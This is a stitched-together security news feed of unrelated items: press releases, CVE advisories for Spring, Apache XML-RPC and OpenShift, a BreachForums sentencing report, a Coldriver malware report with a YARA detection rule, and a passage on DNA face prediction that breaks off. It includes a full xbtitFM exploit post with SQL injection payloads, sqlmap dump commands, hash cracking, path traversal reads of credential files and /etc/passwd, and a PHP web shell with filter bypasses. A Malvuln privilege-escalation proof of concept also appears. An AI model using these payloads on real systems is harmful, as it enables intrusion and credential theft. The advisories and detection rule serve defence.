By Owais Sultan
Deloitte Partners with Memcyco to Combat ATO and Other Online Attacks with Real-Time Digital Impersonation Protection Solutions.
This is a post from HackRead.com Read the original post: Deloitte Teams Up with Memcyco for Real-Time Digital Impersonation Protection

Under their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services.

Memcyco will showcase its solutions at Deloitte’s annual Cyber iCON event, demonstrating how organizations can build effective defences to protect their customers against digital impersonation fraud 

Memcyco Inc, the real-time digital impersonation detection and prevention solution provider, and Deloitte, the leading consulting, advisory, and audit services firm, today announced their strategic partnership in the cybersecurity sector. The partnership enables Deloitte to extend this range of solutions offering customers Memcyco’s industry-leading anti-impersonation software. The solutions will be offered globally in regions such as the EMEA, LATAM, USA, and others.

Deloitte and Memcyco’s pivotal collaboration combines the former’s consulting expertise with the latter’s cutting-edge platform for detecting and preventing digital impersonation fraud in real-time.

This alliance will elevate fraud prevention to a new level, helping government organizations, enterprises, and brands protect themselves from damage and safeguard their reputations from being tarnished through attacks that use phishing sites to target their customers. 

Under their partnership, Memcyco and Deloitte will leverage additional solutions related to integration and cooperation, such as Deloitte’s Strategic & Reputation Risk Services. This multidisciplinary synergy ensures a holistic response to threats, capitalizing on each organization’s area of expertise and accumulated experience, thus offering more robust and complete solutions to clients.

Memcyco provides a platform for real-time detection, protection, and response to online impersonation attacks, whereby malicious actors use phishing, smishing, and other techniques to direct customers to fake pages that look and feel much like the real thing. These attacks trick users into giving up their data, such as login credentials and credit card information, which is subsequently used for ATO (account takeover) and other online attacks, leading to data breaches, theft of funds, and ransomware.

Unlike other solutions, Memcyco is singularly able to safeguard the “window of exposure” between when a fake website goes live and when the attacker attempts to use stolen data to access company web pages, using real-time alerts to warn users not to trust the spoofed site, as well as tracking attacker and victim activity. Addressing this window is crucial for organizations to be able to protect themselves from data breaches, financial losses, and reputational damage while protecting their customers from identity theft and financial harm. 

Memcyco also provides organizations with full insight into attacks, including a list of all victims. This data not only gives the organization improved visibility, but also helps risk engines to predict fraud more accurately, thereby significantly decreasing remediation costs.

“Memcyco is delighted to build a partnership with Deloitte due to its dedicated team, expertise, and innovation capabilities,” said Israel Mazin, CEO of Memcyco. “Our shared commitment to empowering organizations to make informed decisions about their cybersecurity strategy is at the heart of our collaboration. In the long term, this partnership will pave the way for organizations of all sizes to mitigate impersonation and brandjacking attacks and to gain more trust from their customers.” 

Memcyco will showcase its solutions at the third annual Deloitte Cyber iCON event in Spain on Jan 23, 2024. Cyber iCON allows businesses to gain first-hand knowledge about the most prevalent and sophisticated cyber threats they face today.

Attendees will be able to learn about the latest strategies and countermeasures they can employ to safeguard themselves against advanced threats via real-world, interactive scenarios.

Memcyco’s representatives will join Deloitte’s experts on stage to discuss the dangers presented by digital impersonation and to introduce businesses to their comprehensive solution for mitigating such risks. Memcyco will also participate in a joint panel discussion and presentation alongside Deloitte’s expert cybersecurity consultants. 

****About Memcyco****

Memcyco provides real-time digital impersonation detection, protection and response solutions to companies and their customers. Their real-time, agentless solutions are unique in fully safeguarding the critical “window of exposure” between when a fake site goes live and when an attacker attempts to use stolen data to access company web pages.

Memcyco alerts users who visit fake sites and gives organizations complete visibility into the attack, allowing them to take remediating actions. Led by industry veterans, Memcyco is committed to ensuring the security and digital trust of its customers – and of their customers. For more information.

****About Deloitte****

Deloitte has contributed to the development of business organizations and society during its more than 175 years of history. Faced with a constantly evolving reality, it has established itself as the advisor of reference for the transformation of large national and multinational companies using a multidisciplinary approach based on excellence, technological innovation and the continuous development of the talent of its professionals, maintaining its position as a leading professional services firm.

The organization has strengthened its position by impacting clients, communities and people through the Make an Impact that Matters initiative, which is implemented in social action programs -WorldClass-, action against climate change -WorldClimate-, and its ALL IN diversity and inclusion strategy. Globally, the firm is present in more than 150 countries, where more than 345,000 professionals work.

****Contact****

*   **Sheena Kretzmer**
*   **\[email protected\]**

Deloitte Teams Up with Memcyco for Real-Time Digital Impersonation Protection

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.

Specifically, an application is vulnerable when all of the following are true:

  *  the application uses Spring MVC
  *  Spring Security 6.1.6+ or 6.2.1+ is on the classpath


Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.




1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-22233

**Spring Framework server Web DoS Vulnerability**

High severity GitHub Reviewed Published Jan 22, 2024 to the GitHub Advisory Database • Updated Jan 23, 2024

**Package**

maven org.springframework:spring-core (Maven)

**Affected versions**

\>= 6.1.0, < 6.1.2

< 6.0.15

**Patched versions**

6.1.2

6.0.15

In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.

Specifically, an application is vulnerable when all of the following are true:

*   the application uses Spring MVC
*   Spring Security 6.1.6+ or 6.2.1+ is on the classpath

Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2024-22233
*   https://spring.io/security/cve-2024-22233/

Published to the GitHub Advisory Database

Jan 22, 2024

Last updated

Jan 23, 2024

GHSA-r4q3-7g4q-x89m: Spring Framework server Web DoS Vulnerability

Gentoo Linux Security Advisory 202401-26 - Multiple vulnerabilities have been found in Apache XML-RPC, the worst of which could result in arbitrary code execution. Versions less than or equal to 3.1.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Apache XML-RPC: Multiple Vulnerabilities  
     Date: January 22, 2024  
     Bugs: #713098  
       ID: 202401-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache XML-RPC, the worst of  
which could result in arbitrary code execution.

Background  
==========

Apache XML-RPC (previously known as Helma XML-RPC) is a Java  
implementation of XML-RPC, a popular protocol that uses XML over HTTP to  
implement remote procedure calls.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
dev-java/xmlrpc  <= 3.1.3      Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Apache XML-RPC. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for Apache XML-RPC. We recommend that  
users unmerge it:

  # emerge --ask --depclean "dev-java/xmlrpc"

References  
==========

[ 1 ] CVE-2016-5002  
      https://nvd.nist.gov/vuln/detail/CVE-2016-5002  
[ 2 ] CVE-2016-5003  
      https://nvd.nist.gov/vuln/detail/CVE-2016-5003  
[ 3 ] CVE-2019-17570  
      https://nvd.nist.gov/vuln/detail/CVE-2019-17570

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-26

xbtitFM versions 4.1.18 and below suffer from remote shell upload, remote SQL injection, and path traversal vulnerabilities.

    # Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities# Date: 22-01-2024# Exploit Author: Who cares anyway# Vendor Homepage: https://xbtitfm.eu# Affected versions: 4.1.18 and prior# CVE : Who cares anyway# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.Looking at the state and the age of the codebase there are probably more, but who cares anyway...[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]Some examples:Get DB name:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100)))) Get DB user:/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100)))) Get password hash of any user (might need some modification to work on different instances):/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);Now the fun part. Automate it with sqlmap to dump the database.1) Get DB namesqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db2) Get table namessqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables3) Dump users table (usually called xbtit_users)sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump4) Crack hashes (usually unsalted MD5, yey!)hashcat –m 0 xbtitfm_exported_hashes.txt wordlist.txtPro tip: Use All-in-One-P (https://weakpass.com/all-in-one)[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)https://example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path2) Read files that contain database credentials.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.phphttps://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.phpOr any other system file you want.https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.phpIf so, go to https://example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy.[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]If that wasn't enough already and you want RCE, visit https://example.xyz/index.php?page=file_hostingIf the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enought to bypass the filetype checks.A silly contermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"Content-Type: image/gifGIF89a;<html><body><form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?pHp    if(isset($_GET['cmd']))    {        system($_GET['cmd']);    }?></pre></body></html>The web shell will then be uploaded here:https://example.xyz/file_hosting/definately_not_a_shell.phpIf the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.

xbtitFM 4.1.18 SQL Injection / Shell Upload / Traversal

TrojanSpy Win32 Nivdort malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy Win32 NivdortVulnerability: Insecure Permissions - EoP (SYSTEM) Family: NivdortType: PE32MD5: 15bda00b57e2ed729a45f7cfa62165daVuln ID: MVID-2024-0668Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exeDisclosure: 01/20/2024Description:The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.C:\>cacls C:\pewcvmnvyr\jwgaklb.exeC:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F                          NT AUTHORITY\SYSTEM:(ID)F                          BUILTIN\Users:(ID)R                          NT AUTHORITY\Authenticated Users:(ID)CC:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus        TYPE               : 110  WIN32_OWN_PROCESS (interactive)        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 0   IGNORE        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystemExploit/PoC:Open a cmd prompt as standard user:1) unhide the service binary   C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe2) rename the service binaryC:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED3) optional replace with your own binary and escalate to SYSTEMC:\Users\norgt>dir \pewcvmnvyr\ Directory of C:\pewcvmnvyr        ..01/14/2024  02:05 AM                 0 dqrpgvnkh01/14/2024  02:05 AM                 6 egjrdhynfm01/14/2024  02:09 AM                 4 nhefhloix01/14/2024  02:05 AM           332,800 PWNED   <================= DONE01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy Win32 Nivdort MVID-2024-0668 Insecure Permissions

Red Hat Security Advisory 2024-0204-03 - Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0204.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.14.9 bug fix and security update  
Advisory ID:        RHSA-2024:0204-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0204  
Issue date:         2024-01-20  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.9 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.9. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:0207

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://issues.redhat.com/browse/OCPBUGS-19431  
https://issues.redhat.com/browse/OCPBUGS-22360  
https://issues.redhat.com/browse/OCPBUGS-22788  
https://issues.redhat.com/browse/OCPBUGS-22895  
https://issues.redhat.com/browse/OCPBUGS-23936  
https://issues.redhat.com/browse/OCPBUGS-24037  
https://issues.redhat.com/browse/OCPBUGS-24640  
https://issues.redhat.com/browse/OCPBUGS-25595  
https://issues.redhat.com/browse/OCPBUGS-25804  
https://issues.redhat.com/browse/OCPBUGS-25997  
https://issues.redhat.com/browse/OCPBUGS-26006  
https://issues.redhat.com/browse/OCPBUGS-26044  
https://issues.redhat.com/browse/OCPBUGS-26065  
https://issues.redhat.com/browse/OCPBUGS-26171  
https://issues.redhat.com/browse/OCPBUGS-26207  
https://issues.redhat.com/browse/OCPBUGS-26214  
https://issues.redhat.com/browse/OCPBUGS-26421

Red Hat Security Advisory 2024-0204-03

By Deeba Ahmed
Conor Brian Fitzpatrick (Pompompurin on the forum) launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums.
This is a post from HackRead.com Read the original post: BreachForums Admin Pompompurin Gets 20-Year Supervised Sentence

Conor Brian Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum.

Conor Brian Fitzpatrick, a 21-year-old man from Peekskill, New York, has been sentenced to 20 years of supervised release in the Eastern District of Virginia for operating the notorious BreachForums hacking forum.

For your information, Fitzpatrick launched BreachForums in March 2022 after the FBI took down the then-popular cybercrime marketplace, RaidForums. It served as an ideal platform for selling/leaking millions of personal data worldwide. The platform contained nearly 900 stolen databases storing more than 14 billion individual records, which BreachForums members were entitled to use. 

BreachForums ceased operations after the FBI apprehended Fitzpatrick and reportedly reemerged under the management of ShinyHunters, causing concern among cybersecurity experts and law enforcement agencies worldwide. Baphomet, one of the original forum administrators, confirmed the resurgence in a PGP-signed message, leaving little doubt about its authenticity.

Fitzpatrick was arrested on 15th March 2023 from his family home. Under custody, he admitted to owning/operating BreachForums under the “pompompurin” moniker. The accused was released on a $300,000 bond and was re-arrested on 2nd January 2024 for violating pretrial release conditions by using a computer without the required monitoring software and using VPN services.

Fitzpatrick was charged in March 2023 for stealing and selling sensitive personal data of countless US citizens and US and foreign organizations and government agencies via the forum. Court documents reveal that he possessed nearly 26 video files containing sexually explicit videos of minors, including prepubescent ones. Prosecutors claimed Fitzpatrick knowingly possessed these files.

The sentencing recommendation memo reveals several incidents involving Fitzpatrick, including a data leak in December 2022 exposing records of 87,760 members of InfraGuard, 200 million users of a US social media company, 20 million user records for a background check service company, and data theft involving thousands of users’ private health insurance information in March 2023.

Fitzpatrick pleaded guilty to several counts, including Conspiracy to Commit Access Device Fraud, Solicitation for the Purpose of Offering Access, and Possession of CSAM on July 13, 2023 (PDF). He served as a middleman for stolen data transactions and admitted to feeding false information to law enforcement.

Prosecutors sought 188 months (15.7 years) of imprisonment. The defendant’s attorneys filed a memo under seal recommending his sentencing, citing confidential and medical information that should not be disclosed to the public. The court showed leniency and sentenced Fitzpatrick to time served and 20 years of supervised release. The sentencing memorandum was submitted (PDF) on 16th January 2024.

Per the sentencing conditions (PDF), for the first two years of his release, Fitzpatrick will stay at home arrest with a GPS locator and also receive mental health treatment. Fitzpatrick cannot access the internet during his first year of supervised release, and a probation officer will install monitoring software on his computer.

Prosecutors claimed that Fitzpatrick’s platform enabled hackers and fraudsters to commit “more sophisticated crimes than any could have done alone,” impacting nearly every sector of U.S. society.

****_RELATED ARTICLES_****

1.  **Authorities seize the world’s biggest dark web child abuse site**
2.  **Data Breach at New BreachForums: 4,000 members’ data leaked**
3.  **Gender Diversity in Cybercrime Forums: Women Users on the Rise**
4.  **Raidforums Database Leak: Data of 460,000 Users Dumped Online**
5.  **Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**

BreachForums Admin Pompompurin Gets 20-Year Supervised Sentence

Russian state-sponsored actor Coldriver uses spear phishing attacks to install the Spica backdoor on victim systems.

Researchers at Google’s Threat Analysis Group (TAG) have published their findings about a group they have dubbed Coldriver. The main targets of the Coldriver group are high-profile individuals in non-governmental organizations (NGOs), former intelligence and military officials, and NATO governments. These targets are approached in spear phishing attacks.

The group uses social engineering techniques to persuade their targets to open documents or download malware. Their activities are aligned with those of the Russian government, so it’s pretty safe to say that Coldriver is a state-sponsored group.

In December 2023, the US charged two Russians believed to be members of this group, for their role in a campaign that hacked government accounts.

Microsoft, who tracks the group as Star Blizzard, says the group targets individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests.

Typically, the group creates an impersonation account that pretends to be an expert in a field the target might be interested in or that is somehow affiliated with the target. Once a relationship has been established, the target will receive a phishing link or a document containing such a link.

To gain trust, Coldriver uses social media and professional marketing systems to build a profile of its target. With that information the group sets up email contacts, social media and other networking accounts that align with the target’s interests and appear legitimate.

Coldriver uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton Mail in the initial approach, impersonating known contacts of the target or well-known names in the target’s field of interest or sector. The group is also known to register malicious domains that mimic legitimate organizations.

Recently, TAG has noticed that the group uses “lure documents” to install a backdoor on the target’s system. These lure documents, which are harmless PDF files, are sent to the target, but when they open them the content appears to be encrypted.

When the target queries about the encryption, Coldriver sends the target a link to a decryption utility, typically hosted on a cloud storage site. This so-called decryption utility shows the target a normal PDF file, so that it appears as if the original was decrypted, but at the same time it installs a backdoor.

This backdoor is custom malware, likely developed by or for Coldriver, called Spica. Spica is written in the Rust programming language and supports, among others, these commands:

*   Execute arbitrary shell commands
*   Steal cookies from Chrome, Firefox, Opera, and Edge
*   Upload and download files
*   Analyze the filesystem by listing the content
*   Enumerate documents and copy them to an archive

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.

TAG suspects but has been unable to verify that there are multiple variants of Spica: one to match each lure document sent to targets.

**YARA rule**

YARA is a tool that can identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.

TAG has created a YARA rule that cab help find the Spica backdoor.

rule SPICA\_\_Strings {  
meta:

author = “Google TAG”  
description = “Rust backdoor using websockets for c2 and embedded decoy PDF”  
hash = “37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9”  
strings:  
$s1 = “os\_win.c:%d: (%lu) %s(%s) – %s”  
$s2 = “winWrite1”  
$s3 = “winWrite2”  
$s4 = “DNS resolution panicked”  
$s5 = “struct Dox”  
$s6 = “struct Telegram”  
$s8 = “struct Download”  
$s9 = “spica”  
$s10 = “Failed to open the subkey after setting the value.”  
$s11 = “Card Holder: Bull Gayts”  
$s12 = “Card Number: 7/ 3310 0195 4865”  
$s13 = “CVV: 592”  
$s14 = “Card Expired: 03/28”

$a0 = “agent\\\\src\\\\archive.rs”  
$a1 = “agent\\\\src\\\\main.rs”  
$a2 = “agent\\\\src\\\\utils.rs”  
$a3 = “agent\\\\src\\\\command\\\\dox.rs”  
$a4 = “agent\\\\src\\\\command\\\\shell.rs”  
$a5 = “agent\\\\src\\\\command\\\\telegram.rs”  
$a6 = “agent\\\\src\\\\command\\\\mod.rs”  
$a7 = “agent\\\\src\\\\command\\\\mod.rs”  
$a8 = “agent\\\\src\\\\command\\\\cookie\\\\mod.rs”  
$a9 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\mod.rs”  
$a10 = “agent\\\\src\\\\command\\\\cookie\\\\browser\\\\browser\_name.rs”  
condition:  
7 of ($s\*) or 5 of ($a\*)  
}

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Coldriver threat group targets high-ranking officials to obtain credentials 

By Owais Sultan
Finclusive, Verida and cheqd Launch Pioneering Solution For Reusable And Verifiable KYC/KYB Credentials.
This is a post from HackRead.com Read the original post: Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

KYC/KYB compliance technology provider FinClusive said today it’s partnering with Verida and cheqd to launch an end-to-end platform for the creation and issuance of reusable and verifiable credentials that can be checked in real-time without impacting the privacy of clients. The partners say it’s a key innovation that promises to streamline client onboarding in both traditional finance and the nascent Web3 industry. 

What they’re offering is a plug-and-play platform that can handle the KYC/KYB requirements of any financial services organization, and generate verifiable credentials that are reusable and portable, with full client privacy and embedded compliance. 

The partnership builds on an earlier proof-of-concept demonstrated by FinClusive and Verida, which provides a mobile wallet for storing verifiable credentials. With the addition of cheqd into the mix, FinClusive said it can now offer the essential network infrastructure for Web3 companies to issue and verify credentials in seconds. 

With their new solution, the companies are looking to tackle some of the most significant headaches faced by organizations in the traditional customer onboarding and verification process, which is both expensive and time-consuming. Issuing digital credentials that can be reused, helps to eliminate the high costs associated with KYC/KYB. Moreover, with its instantaneous check feature for AML assistance, risk scoring and other background screenings, the solution makes it simpler than ever to meet compliance requirements. Finally, by integrating real-time and verifiable data sharing into the solution, the companies say they can provide maximum assurance for businesses, without requiring them to perform any manual checks. 

By addressing these headaches, Finclusive says it’s bringing significant value to businesses, reducing their operating costs and improving the efficiency of their screening processes. 

**Streamlined Customer Onboarding**

Each of the partners brings its strengths to the table, offering a variety of capabilities that are needed to create a regulatory-compliant process for verifying and sharing KYC credentials. FinClusive handles the initial identity verification checks with support for more than 170 countries, while cheqd’s Credential Service enables verifiable digital credentials to be issued, based on the results of those checks, and shared with other parties. As for Verida, it provides a decentralized wallet infrastructure for businesses and individuals to cryptographically store their KYC/KYB credentials inside a secure Verida Vault.

As the companies explained, the biggest advantage for businesses and individuals is that they will only ever have to undergo KYC/KYB once, and then use their verified credentials to access any application or service without constantly repeating that process. However, the solution goes further than similar offerings, leveraging FinClusive’s compliance tech and cheqd’s infrastructure platform to provide instant lookups for AML screenings and other background checks, meaning that the credentials can be verified, issued, managed, shared and revoked at any time. 

The beauty of this platform is that customers can maintain self-sovereign control of their KYC/KYB data, in keeping with regulations such as Europe’s existing GDPR and upcoming eIDAS, and the U.S. CCPA standard. Previously, where KYC/KYB data would have to be shared with multiple financial services providers, this information remains private yet fully verifiable. In this way, the partners are creating a more efficient market for identity verification while eliminating the need to replicate and store sensitive information. 

**Real-Time Monitoring **

Uniquely, FinClusive and its partners can facilitate enhanced and ongoing KYC/KYB processes beyond the initial onboarding stage. In some financial markets, service providers have additional obligations such as ongoing client monitoring, dynamic risk scoring and continuous AML screening checks. Using FinClusive’s tools, the solution can automate real-time client monitoring processes within an easy-to-use dashboard, while also enabling the simultaneous verification and live “double-check” of KYC/KYB data. 

**Disrupting Regulated Industries**

The companies cite several obvious use cases for their new solution, such as onboarding at any bank or nonbank financial service, plus any virtual asset service provider, at low cost and with more streamlined efficiency. The solution will also support KYC/KYB for eCommerce and online retailers, access to age-restricted content, government services and cross-border transactions. Finally, it also paves the way for KYC/KYB data to be paired with educational, employment, loyalty and health credentials to build higher levels of assurance and reinforce digital identities and reputations. 

Following today’s announcement, the companies say they’re expecting to roll out the first verifiable credentials for KYC/KYB within the first quarter of this year, kick-starting a revolution that will modernize client onboarding and monitoring across both traditional finance and the Web3 industry. 

Alex Tweeddale, a product lead at cheqd, said the collaboration is extremely innovative, paving the way for real-time monitoring and verification in a fully decentralized and private manner. “This is completely new to the market and enables us to provide a fully regulatory-compliant solution for customer onboarding and monitoring, while simultaneously being future-proofed for the new eIDAS 2.0 regulation for digital credentials,” he said. “This can revolutionize the existing paradigm for customer data sharing, reducing costs and friction within existing regulated industries and emerging markets where identity verification is currently too costly.”

Finclusive, Verida, and cheqd Launch Reusable KYC/KYB Solution

Police around the US say they're justified to run DNA-generated 3D models of faces through facial recognition tools to help crack cold cases. Everyone but the cops thinks that’s a bad idea.

In 2017, detectives working a cold case at the East Bay Regional Park District Police Department got an idea, one that might help them finally get a lead on the murder of Maria Jane Weidhofer. Officers had found Weidhofer, dead and sexually assaulted, at Berkeley, California’s Tilden Regional Park in 1990. Nearly 30 years later, the department sent genetic information collected at the crime scene to Parabon NanoLabs—a company that says it can turn DNA into a face.

Parabon NanoLabs ran the suspect’s DNA through its proprietary machine learning model. Soon, it provided the police department with something the detectives had never seen before: the face of a potential suspect, generated using only crime scene evidence.

The image Parabon NanoLabs produced, called a Snapshot Phenotype Report, wasn’t a photograph. It was a 3D rendering that bridges the uncanny valley between reality and science fiction; a representation of how the company’s algorithm predicted a person could look given genetic attributes found in the DNA sample.

The face of the murderer, the company predicted, was male. He had fair skin, brown eyes and hair, no freckles, and bushy eyebrows. A forensic artist employed by the company photoshopped a nondescript, close-cropped haircut onto the man and gave him a mustache—an artistic addition informed by a witness description and not the DNA sample.

